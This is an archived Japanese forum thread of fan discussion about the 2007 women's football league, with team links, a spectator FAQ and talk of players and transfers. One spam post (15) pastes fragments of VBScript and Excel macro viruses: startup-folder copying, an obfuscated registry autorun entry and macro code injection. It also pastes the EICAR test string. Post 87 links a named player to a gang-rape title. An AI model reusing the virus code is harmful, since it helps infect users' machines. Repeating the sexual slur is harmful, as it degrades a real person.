5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

mocなでしこリーグ(Lリーグ)女子サッカー part28

1 :1:2007/01/16(火) 01:19:40 ID:FuDbQfom0
スポンサー様に感謝。

2006年シーズンは、無事に終了しました。
本年も、なでしこリーグ、女子サッカーを応援よろしくお願いします。

【注意】
■時々荒らしが湧いてきます。
■完全無視・完全放置でお願いします。

前スレ
mocなでしこリーグ(Lリーグ)女子サッカー part27
http://ex13.2ch.net/test/read.cgi/soccer/1165596591/

日本女子サッカーリーグ公式ホームページ
http://www.nadeshikoleague.jp/
日本サッカー協会 女子サッカー
http://www.jfa.or.jp/women/
サッカーやろうよ!女子チーム検索サイト
http://www.jfa-teams.jp/

※初めてこのスレにいらした方は、書き込み前に>>2-20あたりをご覧下さい。
スケベ目的なネタは厳禁。かわいい子とか知りたかったらスタジアムで探してね。
尚、サポネタ・テンプレ作成・要望はこちらでお願いします。
Lリーグ&女子サッカー、他 避難所
http://jbbs.livedoor.jp/sports/5908/


2 :U-名無しさん:2007/01/16(火) 01:20:25 ID:Hb+lpHin0
2

3 :1:2007/01/16(火) 01:21:24 ID:FuDbQfom0
チーム公式サイト

2007年度 Div.1
浦和レッドダイヤモンズレディース
http://www.urawa-reds.co.jp/ladies/
日テレ・ベレーザ
http://beleza.ameblo.jp/
アルビレックス新潟レディース
http://www.albirex.co.jp/under/ladys/
大原学園JaSRA 女子サッカー部
http://www.jasra.ac.jp/
伊賀FCくノ一(準公式)
http://www.iga-younet.co.jp/kunoichi/
TASAKIペルーレFC
http://www.tasaki.co.jp/what/perule1.html
INACレオネッサ
http://www.inac.or.jp/
岡山湯郷Belle
http://www.yunogo-belle.com/


4 :1:2007/01/16(火) 01:22:43 ID:FuDbQfom0
2007年度 Div.2
東京電力(TEPCO)マリーゼ
http://www.tepco-mareeze.jp/
ASエルフェン狭山FC
http://homepage1.nifty.com/as-elfen/
ジェフユナイテッド市原・千葉レディース
http://www.so-net.ne.jp/JEFUNITED/
清水第八スポーツクラブ
http://www.sdh-1978.com/
スペランツァFC高槻
http://www.fctakatsuki.com/
福岡Jアンクラス
http://www.anclas.jp/
ルネサンス熊本フットボールクラブ
http://homepage2.nifty.com/renaissance/indexold.html

バニーズ京都スポーツクラブは、現在、公式サイトがありません。作成中との事なので完成するまで待ちましょう。



5 :U-名無しさん:2007/01/16(火) 01:22:50 ID:aaONgrOU0
ようこそ!女子サッカースレへ

【萌】moeなでしこリーグ(Lリーグ)女子サッカー part28【萌】

6 :1:2007/01/16(火) 01:24:07 ID:FuDbQfom0
関連サイト・スレ
過去ログ置き場
http://tokyo.cool.ne.jp/l2ch/
チーム紹介など
http://k.excite.co.jp/hp/u/l2ch/
【なでしこJAPAN】日本女子代表総合スレッドPart.12
http://ex13.2ch.net/test/read.cgi/eleven/1164375315/

【無料】Lリーグ・女子サッカーの会場【マターリ】
http://sports9.2ch.net/test/read.cgi/stadium/1098238415/
2002world「頑張れ!女子サッカー」
http://www.2002world.com/column/women/woman.html
J's GOAL なでしこジャパン
ttp://www.jsgoal.jp/japan/nadeshiko/
J's Goal 日本女子代表特集(2004アテネ五輪アジア地区最終予選特集)
http://www.jsgoal.jp/w_japan/


写真・動画などをうpしたい方はこちら(良識のある使い方をおながいします)
スタジアム写真をウプするスレPart13
http://ex13.2ch.net/test/read.cgi/soccer/1167323166/
サッカー動画&写真うpスレin国内板
※現在スレがありません


7 :1:2007/01/16(火) 01:25:02 ID:FuDbQfom0
<なでしこリーグ・女子サッカー観戦のためのFAQ>

Q・なでしこリーグのチケットはどこで売ってますか?
A・なでしこリーグは原則全試合無料です。ただし、有料試合がいくつかありますので、詳細は
その都度ご確認ください:
 1.浦和の全ホームゲーム、新潟の一部ホームゲーム
 2.日テレホームゲームの茨城県内会場開催分
 3.Jリーグの試合とダブルヘッダーの場合、一部試合で(後座の場合は無料が
   多いのですが、前座の場合は有料試合が多いので、要確認)
 4.全日本女子選手権の準々決勝〜決勝戦
 5.なでしこスーパーカップ(1部リーグ優勝チームと、全日本女子選手権優勝
   チームとのカップ戦)

Q・リーグ戦はどこで行なってますか?
A・日本女子サッカーリーグ公式サイト、あるいは各クラブ公式サイトにてご確認ください。
たまに試合会場やキックオフ時刻の変更があります。

Q・スタジアムまでシャトルバスなどはありますか?
A・99,9%ないと思ってください。たまに他スポーツとのからみで運転されているときがありますが、
そのときはラッキーと思ってください。


8 :1:2007/01/16(火) 01:25:36 ID:FuDbQfom0
Q・選手からサインはもらえますか?
A・試合後、出待ちをしていればたいていはもらえます。ただし、選手によっては照れからか
サインを断る可能性もありますので、「楷書でもいいよ」などと気持ちをほぐしてあげましょう。
なお、一部チームではサイン会を時々開催していますので、そこに行くのもひとつの手です。

Q・Jリーグとはここが違います
 1.売店はまずありません・・・食べ物飲み物は事前に準備するのを強くお勧めします。
 2.警備員がいる事もありません・・・ビンカン持ち込み放題ですが、後片付けは忘れずに
  (チームによっては、試合後の会場内後片付けを下部組織や地元高校の女子選手が
  担当しており、練習の合間を縫って無給で来てくれている彼女たちに余計な負担を
  かけないようにするためです。ゴミ袋を持参しておくのもいいかも)。
  ピッチに投げ込むなんて 論 外 で す ! !
 3.野次・ブーイングは、できる限り控えて・・・Lリーガーは全員アマチュア選手の上、
  中学生・高校生の選手も多いので、彼女達がプレーに専念するのを妨げる一因に
  ならないよう、ご協力お願いします。
  2006年版ガイドブックP8では、「ブーイングして欲しい」と書いてありますが、
  もしやる時は節度と敬意を持って…(笑)
 4.観客本位で開催スタジアムは選ばれてません・・・交通アクセスは糞レヴェル、
  行ってみたら鳴り物使用禁止・客席に屋根なし・客席からピッチまでの距離が大きい・
  トイレが遠いなど悪条件が揃いまくってますが、Jで使われるような立派な
  スタジアムを借りるための費用工面が難しいためです。
  ちなみにスタによっては更衣室やシャワー室がない・ピッチがボロボロなど、選手に
  とっても悪条件が揃いまくりですが、そんな環境下でも頑張る選手たちを応援してください。

Q・誰かかわいい子教えろ!巨乳はいないのか?
A・市ね。スケベな視点でしか女子スポーツ見れないのかゴラァ
  どうしても知りたかったらてめえの目で確認に来い!


9 :1:2007/01/16(火) 01:26:34 ID:FuDbQfom0
Q・なでしこリーグ以外の女子サッカーにはどんなものがありますか?

A・地域リーグ(北海道・東北・関東・東海・関西・中国・四国・九州)
  都府県リーグ・都市リーグ・支部リーグ
  (大会としては全日本女子選手権および、その予選となる各地域の女子選手権、
  年代別だとU-18(冬)・U-15(夏)の全国選手権・予選となる各地域選手権など)

  U-12(少女)リーグ
  (大会としてはU-12全国選手権(昨年度から新設)・地域別選手権・8人制サッカー大会など)  
  レディース(ミセス・ママ)リーグ
  (大会としては、秋に静岡で行われる全国レディースサッカー選手権、および
  各地域別選手権(代表決定戦)など)

  高校サッカー ※学校によっては地域リーグなどに参加
  (大会としては冬から春に行われる地域別高校総体(インハイ、全国大会には
  女子サッカーは不参加の模様)、夏に磐田で行われる高校選手権など)

  大学サッカー ※学生リーグ以外に、地域リーグなどに参加するチームあり
  (大会としては冬に神戸で行われる大学選手権(インカレ)など)

  フットサルリーグ
  (リーグ戦や大会などが各地で開催中。大規模の大会としては、秋に東京で
  開催される全国選手権(ティファールカップ)がある。いずれは男子同様、
  日本代表が世界選手権に出る日も間近?)

  国民体育大会(国体)
  だいたい春頃に代表メンバーが選ばれ、7〜8月に各地域代表決定戦、10月の
  本大会が行われます。
  ※2006年兵庫県で開催の、のじぎく兵庫国体は、10月2〜5日に行われました。
  http://www.habatan2006.jp/


10 :1:2007/01/16(火) 01:28:19 ID:FuDbQfom0
Q・Jリーグと関係のあるチームってありますか?

A・浦和レッドダイヤモンズレディース(L1)
  ジェフユナイテッド市原・千葉レディース(L2)
  ジェフユナイテッド市原・千葉ミセス(千葉県レディースリーグ)
  日テレ・ベレーザ(東京ヴェルディ1969、L1)
  アルビレックス新潟レディース(L1)
  ジュビロ磐田レディース(静岡県西部リーグ)
  大分トリニータレディース(2007年より創設)
確認できるのは以上6チームのみ。各クラブは女子チーム作ってどんどんLに殴りこみしる!


Q・下部組織チームって?

A・Jリーグのクラブ同様、下部組織を持ち選手育成を行っているチームがあります
(ただしJと違い、下部組織チーム設置の義務はありません)。
下部組織チームは育成と同時に「女子サッカーの普及」という役割を担う関係上、
殆どのクラブで門戸を開き、サッカー経験者に限らず初心者をも多く受け入れています
(例外:選手育成に特化している日テレ・メニーナはセレクションがあり、これに合格
しないと入団できません)。
高い力量を持つと判断された選手は、トップチームに二重登録されその後昇格して
いきますが、進学や他のクラブへの入団という進路を選ぶ選手も結構います。

入団資格は殆どが小学校高学年から中学生以上ですが、バニーズ京都SPIELENジュニア、
岡山湯郷Belle Kidsジュニア、ルネサンス熊本FCジュニアのように小学生を対象とした
ところもあります。


11 :1:2007/01/16(火) 01:29:46 ID:FuDbQfom0
<下部組織チーム一覧> ※所属リーグは2006年度現在、間違いご指摘頼む

浦和レッドダイヤモンズジュニアユースレディース
(浦和レッドダイヤモンズレディース、関東女子リーグ)
エルフェンMARI(ASエルフェン狭山FC、埼玉県女子リーグ1部)
日テレ・メニーナ(日テレ・ベレーザ、関東女子リーグ)
ジェフユナイテッド市原・千葉レディースU-18(ジェフユナイテッド市原・千葉レディース、所属リーグ不明)
ジェフユナイテッド市原・千葉レディースU-15(ジェフユナイテッド市原・千葉レディース、所属リーグ不明)
アルビレックス新潟レディースU-18(アルビレックス新潟レディース、北信越女子リーグ)
伊賀FCフロイライン(伊賀FCくノ一、東海女子リーグ)
ラガッツァ'99 USED FC高槻スペランツァ(スペランツァFC高槻、関西女子チャレンジリーグ1部)
バニーズSC京都SPIELEN(バニーズ京都SC、関西女子チャレンジリーグ1部・京都府女子リーグ)
バニーズSC京都SPIELENジュニア(バニーズ京都SC、京都府U-12リーグ)
神戸FC1970レディース(TASAKIペルーレFC、関西女子リーグ)
INACレオネッサアマチュア(INACレオネッサ、関西女子チャレンジリーグ1部)
INACレオネッサユース(INACレオネッサ、関西女子チャレンジリーグ3部)
作陽レディース(岡山湯郷Belle)
岡山湯郷Belle Kidsジュニアユース(岡山湯郷Belle)
岡山湯郷Belle Kidsジュニア(岡山湯郷Belle、岡山県U-12リーグ)
女学院Pasodorado(福岡Jアンクラス、福岡県女子リーグ1部)
女学院Tunante(福岡Jアンクラス、福岡県女子リーグ2部)
女学院Junior(福岡Jアンクラス、福岡県女子U-12リーグ)
アンクラスDX(福岡Jアンクラス、福岡県女子リーグ2部)
ルネサンス熊本FCフェニックス(ルネサンス熊本FC、熊本県女子リーグ1部)
ルネサンス熊本FCフェニックスジュニア(ルネサンス熊本FC、熊本県U-12リーグ)


12 :1:2007/01/16(火) 01:31:20 ID:FuDbQfom0
すっかり忘れてたorz

前スレの>10
エルフェンHPは新しくなってますよってに
http://www.as-elfen.or.jp/


13 :U-名無しさん:2007/01/16(火) 01:42:53 ID:m7Pz4zcz0
板内関連スレッド

安藤梢 ドリブラー!!! part4
http://ex13.2ch.net/test/read.cgi/soccer/1165689578/
アルビレックス新潟レディースPart2
http://ex13.2ch.net/test/read.cgi/soccer/1164638667/
【東京電力】 TEPCO マリーゼ その5 【福島】
http://ex13.2ch.net/test/read.cgi/soccer/1163605665/

全日本女子ユース(U-18)サッカー選手権
http://ex13.2ch.net/test/read.cgi/soccer/1167320894/

14 :U-名無しさん:2007/01/16(火) 01:43:38 ID:m7Pz4zcz0
前スレッドにあったテンプレート修正


10 名前:U-名無しさん [sage] 投稿日:2006/12/09(土) 02:09:39 ID:0Hr2Yp9i0
>1
とりあえず乙

エルフェンHPは新しくなってますよってに
http://www.as-elfen.or.jp/


11 名前:U-名無しさん [sage] 投稿日:2006/12/09(土) 02:56:38 ID:oIgpDYpP0
ジェフユナイテッド市原・千葉レディース
http://www.so-net.ne.jp/JEFUNITED/ladies/index.html

15 :U-名無しさん:2007/01/16(火) 18:30:13 ID:jBzx93W30
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

16 :U-名無しさん:2007/01/16(火) 20:27:20 ID:Nk/wcs1s0
>>15
ウイルス野郎、市ね

17 :U-名無しさん:2007/01/16(火) 20:30:42 ID:4geHYNu90
>>16 削除依頼しずらくするレスアンカーつけるな、市ね

18 :U-名無しさん:2007/01/16(火) 21:45:50 ID:pYXTWRwhO
TASAKIはGKそのままで次のシーズン突入するのか?



あ、秋山(;´д`)ハァハァ…

19 :U-名無しさん:2007/01/16(火) 23:39:44 ID:/24KIYH30
選手=モッカー

20 :U-名無しさん:2007/01/16(火) 23:53:20 ID:C6ieJ2/b0
もうそろそろ入団情報あるよね。
個人的には、新人だけでなく各チームの注目選手しりたいな。
なでパンフのような公式じゃなくてさ
サポには絶大の人気選手とか?
代表クラスの情報はあるけど、他のチームの選手のことってあまりわからないし
てかこのスレ、獅子とか大原サポいなくないか?



21 :U-名無しさん:2007/01/17(水) 00:19:41 ID:B1zew4Ke0
>>20

獅子サポではないが、原、藤村のくノ一崩れ(w)はむちゃいいぞ。

とくに藤村タン、プレーオフの対くノ一戦見てマジ惚れますた。

でも未央はオレのもんや、誰にも渡さん(ターニャの方な。別の未央はくれてやるで好きにし)


22 :U-名無しさん:2007/01/17(水) 00:39:53 ID:MnkxvJLl0
>>21
藤村、いいねぇ。
精神的支柱になってるし、闘志むきだしのプレーだし、
読みもあるし、攻め上りもできるし。

半袖をまくりあげてるところも、かっこいい。
俺も惚れた。

23 :U-名無しさん:2007/01/17(水) 00:44:57 ID:SmlLP0DE0
 問題
某選手目当てで、まったく知りもしない男子地域リーグチームの
試合会場に足を運んだのはいいが、お目当ての選手が都合で
応援に来ていなかったwww、というお間抜けな体験をしたサポは?

24 :U-名無しさん:2007/01/17(水) 00:50:59 ID:ss57rmZn0
即効の即答ありがとう
こういうのがなでリーグのよい所だなぁ
オノコのスレだとすぐ、「氏ね」とか、「巣に帰れ」だから
ちなみに俺はベルサポ
ベルは宮間とか、福元。中田ばかりが注目されてるが、俺はひそかに、杉山ファン
帰り咲きの大原とか、新潟もしりたいな。
オノコスレみたいにいじめないからね。

25 :U-名無しさん:2007/01/17(水) 05:23:25 ID:LOy4NXotO
あ、秋山…

26 :U-名無しさん:2007/01/17(水) 09:18:48 ID:j1DMQzmqO
>>23
忍者の問題児だろ
問題ばかり引き起こすあいつがサポ?
あちこち他のブログに
名前を変えて痛い書き込みばかりして
なおかつ自分で自分のコメント消して
いい加減チームとかに迷惑かけてるの気付けよ

自分でブログでもやりゃいいのに



27 :長野市民:2007/01/17(水) 14:19:58 ID:GK69kVLh0
人伝の情報だからどこまで定かかわからないが、
大原の2年生は残らないかもって話。
社会人はそのまま今年も続けるらしい。

中野選手とかいなくなると思うと残念だが、
新入団や新入学には期待してる。

新入学に関しては高校サッカー見てる人のほうが情報もってそうだな。

まあ、とりあえず津波古がんばれってことで。

28 :U-名無しさん:2007/01/17(水) 14:54:33 ID:vDfjM3KP0
Div.1に上がっても中野は卒業移籍か?
大原はある意味女子サッカー界の人材供給の宝庫。
カリタタンもレッズ、庭田も湯郷で決まりらしいね。

29 :U-名無しさん:2007/01/17(水) 18:37:54 ID:LOy4NXotO
あ、あ、秋山…

30 :U-名無しさん:2007/01/17(水) 19:52:31 ID:D7YDN0MZO
代表キャンプメンバーが発表された訳だが
あまり代わり映えしないな

31 :U-名無しさん:2007/01/17(水) 20:04:26 ID:tKajxYsRO
http://pksp.jp/14-maruyama/bbs.cgi?&o=2

32 :U-名無しさん:2007/01/17(水) 20:16:11 ID:/0QEmH1GO
なでしこリーグ開幕は4月28日・29日。
1・2部共に3回戦制。
12月に閉幕。

なでしこリーグカップ開催。
1・2部16チームを4チームつづに4グループに分け、各グループ1位が準決勝へ。

33 :U-名無しさん:2007/01/17(水) 20:21:34 ID:7tXJJ7xf0
http://www.jiji.co.jp/jc/c?g=spo3_scr_30&k=2007011700909
スポンサーはモック?

34 :U-名無しさん:2007/01/17(水) 20:27:08 ID:7tXJJ7xf0
>>30
須藤、豊田は入らず、近賀と原がDF登録とな?

35 :U-名無しさん:2007/01/17(水) 20:38:40 ID:GllbBf0V0
近賀ゆかり〜近賀ゆかり〜GO! GO! Get Goal

がDFですか orz

36 :U-名無しさん:2007/01/17(水) 20:44:05 ID:7tXJJ7xf0
いまからSBやらせるつもりなのかねぇ?

37 :U-名無しさん:2007/01/17(水) 20:55:19 ID:/0QEmH1GO
U-16 AFC
日本対中国
4-2

38 :U-名無しさん:2007/01/17(水) 21:54:11 ID:B1zew4Ke0
>>27
ちょっと教えてほしいんだが。

大原だと社会人選手はどういう位置付けなの?
たとえば教職員みたいな感じで学校に勤めてるの?
それとも他のクラブ系チームみたいに、
地場の職場で会社員orバイトとして働きながらプレイしてるの?

たとえば真珠から移籍した土橋なんかはどういう待遇・位置付けでプレイしてるんだろうか。

知ってたら教えてくれい。



39 :U-名無しさん:2007/01/17(水) 22:36:34 ID:V6/T7b6I0
フィールドの貴婦人 豊田

40 :U-名無しさん:2007/01/17(水) 22:38:33 ID:NAQXHI62O
ピッチの小悪魔、庭田

41 :U-名無しさん:2007/01/17(水) 22:51:50 ID:SJxUkcEQ0
>>30
注目点はINACの原と、研修生としてだが早稲田GKの天野くらいだな。

42 :U-名無しさん:2007/01/17(水) 22:52:12 ID:KXDCqcPp0
フィールドの大爆発 荒川

43 :U-名無しさん:2007/01/17(水) 23:06:17 ID:LOy4NXotO
あ、秋山智美…

44 :U-名無しさん:2007/01/17(水) 23:19:45 ID:/0QEmH1GO
土橋って仕事してるの?
てっきり主婦業に専念してるのかと思ってた。

45 :U-名無しさん:2007/01/17(水) 23:35:21 ID:a1tCf4gi0
なでしこリーグ4月末開幕、リーグ杯新設
http://www.nikkansports.com/soccer/f-sc-tp0-20070117-143765.html


46 :U-名無しさん:2007/01/17(水) 23:52:07 ID:LOy4NXotO
あ、秋山智美…  秋山…

47 :U-名無しさん:2007/01/18(木) 01:44:37 ID:b0DNMc5sO
原、久々の召集だな。
しかしDF登録とは…原のセンスに賭けてみるってことか。
ちょっと期待してみる。

48 :長野市民:2007/01/18(木) 08:55:58 ID:8FdZa+Co0
>>38
土橋選手はどうなってるのかわからんのだが、
既載の選手は確かパンフに勤務先載ってたと思う、
そこで大原学園になってる選手は教職員扱い、
それ以外は近場の職場で働いてるorバイトです。

そういえば職員になった人ってかなり引退しちゃってるな…

49 :U-名無しさん:2007/01/18(木) 09:25:21 ID:eakiV/ylO
男子なら阿部をDF起用するようなものかな
何となくだが原は両SBでの起用かなと思う

50 :U-名無しさん:2007/01/18(木) 09:53:41 ID:j6DiMpEI0
カップ戦、全16チームって事はアサヒナは参入却下なのね。

51 :U-名無しさん:2007/01/18(木) 10:31:17 ID:vWoHT8e4O
今度の日曜に九州リーグ入れ替え戦やるみたいだしな

52 :U-名無しさん:2007/01/18(木) 11:12:25 ID:j6DiMpEI0
それって何か関係あるの?

53 :U-名無しさん:2007/01/18(木) 11:14:03 ID:eakiV/ylO
>>50
そもそも、加盟申請出てるのか?

54 :U-名無しさん:2007/01/18(木) 11:19:28 ID:j6DiMpEI0
申請出したってのは別チームのブログで見たような。
アサヒナのブログもあったような気がするんだが、
そっちには申請の件は何もなかったような。
アサヒナのブログ自体、全女敗退後に消えてるっぽい。

55 :U-名無しさん:2007/01/18(木) 12:04:05 ID:vWoHT8e4O
>>52
アサヒナがなでしこ参入するなら入れ替え戦無し。
(去年は無かった。)

56 :U-名無しさん:2007/01/18(木) 12:18:34 ID:j6DiMpEI0
>>55
ああ、そういう事ね。ドモアリガト

57 :U-名無しさん:2007/01/18(木) 13:25:26 ID:qJv7egtMO
INAC主催のたんばバレンタインカップに出場するチームを知っていたら教えてほしぃ…

58 :U-名無しさん:2007/01/18(木) 18:40:20 ID:j6DiMpEI0
カップ戦組み分け予想

○日テレ、INAC、千葉、清水
○浦和、大原、東電、熊本
○TASAKI、伊賀、福岡、京都
○湯郷、新潟、高槻、狭山

59 :U-名無しさん:2007/01/18(木) 19:40:40 ID:VA0va6pJ0
>>49
原はSBだろう。
しかし、INACは原と土橋を再生したね。
原はINACに行ってからモチベーションの高さというか精神的な充実を感じる。

60 :U-名無しさん:2007/01/18(木) 19:51:04 ID:hq/Rb6ljO
あ、秋山智美…

61 :U-名無しさん:2007/01/18(木) 20:07:28 ID:w2UBs9dh0
鈴木うざいよ鈴木

62 :U-名無しさん:2007/01/18(木) 21:02:06 ID:RObBU3CQO
>>61
お前がウザい。


63 :U-名無しさん:2007/01/18(木) 22:24:43 ID:1Gf0MngtO
INACは原と藤村、土橋は大原学園
代表経験者、共に活躍中!

64 :U-名無しさん:2007/01/18(木) 22:44:49 ID:hq/Rb6ljO
秋山…

65 :U-名無しさん:2007/01/18(木) 23:05:46 ID:b0DNMc5sO
俺もINACの試合何度か見たけれど、
確かに原、藤村のエネルギーすごい。
それに後押しされてか、他の選手の
モチベーションも迫るものがあった。
どんな補強をするかは分からんが、
今年は結構怖いチームになると思う。
なにはともあれ、原ガンバレ。

66 :U-名無しさん:2007/01/18(木) 23:20:54 ID:ByosnkJ20
そういや、全女準々決勝@広島に来てたなーカリアゲ。
田崎−伊賀と、湯郷−INACのやつ。

67 :U-名無しさん:2007/01/19(金) 10:41:57 ID:04XKaPBLO


68 :U-名無しさん:2007/01/19(金) 13:04:30 ID:eybUGsc10
INACがリーグNo.1の潤沢な資金力でプロ契約を餌にTASAKIから選手をかっさらったら神戸ダービーも盛り上がりそうだな。
INACって外国人枠撤廃してもらえれば優勝も狙える実力はあるよな。

69 :U-名無しさん:2007/01/19(金) 13:15:31 ID:rMCW9BEH0
<丶`∀´>

70 :U-名無しさん:2007/01/19(金) 13:18:24 ID:pd/k3ZyFO
強くなってもチームとしての人気がなあ…
関西の2チーム、サポとかショボいから
それも問題だろ

71 :U-名無しさん:2007/01/19(金) 13:22:24 ID:eybUGsc10
U-16オーストラリア女子代表 - U-16日本女子代表@シドニー
日本負け、0−1



72 :U-名無しさん:2007/01/19(金) 14:54:36 ID:t9GOFitVO





森本麻衣子







73 :U-名無しさん:2007/01/19(金) 18:24:27 ID:QG39TJjLO
今年、関西でオールスター戦をやったら興業的には大失敗になりそうだな。神戸ウィングに1000人だとかなりショボ。

意外とビッグスワンでやったら2万人とか入っちゃったりして。
アルビがDiv.1にいる今年がラストチャンスだけどね。

74 :   :2007/01/19(金) 20:09:14 ID:4oWenICd0
いや、ここぞとばかりT崎が社員と関連に動員をかけ、雌獅子組も関連組織に
チケットを配布するかもしれんぞ。

T電やアルビほどぢゃないにしても。

75 :U-名無しさん:2007/01/19(金) 20:16:13 ID:iy4bNA9L0
>>74 そして佐川急便社員応援団が大挙訪れると・・・((;゚Д゚)ガクガクブルブル

76 :   :2007/01/19(金) 20:18:57 ID:4oWenICd0
でも京都は2部だからオールスターには(ry

77 :U-名無しさん:2007/01/19(金) 20:33:24 ID:qllep+ivO
そこで東電が圧力をry

78 :U-名無しさん:2007/01/19(金) 20:51:35 ID:QG39TJjLO
INACの関連組織がスタジアムを赤で染めたらそれはそれで壮観。本気になったら動員力と資金力はピカ一!

「テーハミンゴク、ドンドン、ドドドン」のリズムに合わせて赤い方々と田崎の社員さんが共闘するゴール裏も一度は見てみたい。

79 :U-名無しさん:2007/01/19(金) 21:33:19 ID:mu5PovMnO
秋山… あ、あ、秋山…

80 :U-名無しさん:2007/01/20(土) 06:31:55 ID:HfkUEdFl0
なでしコラム更新だぞゴルァ!!!!

81 :U-名無しさん:2007/01/20(土) 12:37:04 ID:D5vrtGZb0
今回のコラムつまんない

82 :U-名無しさん:2007/01/20(土) 12:50:05 ID:iUaFw32k0
ttp://www.moodindigo.org/blog/archives/000259.html
一人当たり、なんと平均でも年135万円


83 :ケータイから失礼します:2007/01/20(土) 13:26:13 ID:lkLDMPIAO
アノ〜 レ(゚ε゜)なでをモデルにドラマ化されたら(フジ月9辺で)
皆様ならドコのチームが希望ですか〜?
また、この選手役にアノ俳優が(・∀・)イイ!とか
そんな御意見をばヨロシクども お願い致します
m(_ _)m

84 :U-名無しさん:2007/01/20(土) 13:36:31 ID:nvrfXVPVO
GKの母
主演:志田未来
提供:田崎真珠

85 :U-名無しさん:2007/01/20(土) 13:45:28 ID:vjdrAQzU0
yamaちゃん引退だって

86 :U-名無しさん:2007/01/20(土) 13:52:50 ID:bcW2uWxa0
>>83
「エラいところに入団してしまった!」

丸山桂里奈=仲間由紀恵

87 :U-名無しさん:2007/01/20(土) 14:22:59 ID:j91CXEjDO
輪姦学校=森本麻衣子

88 :U-名無しさん:2007/01/20(土) 15:25:19 ID:6HYYAUupO
>>86
ワロタ

26 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)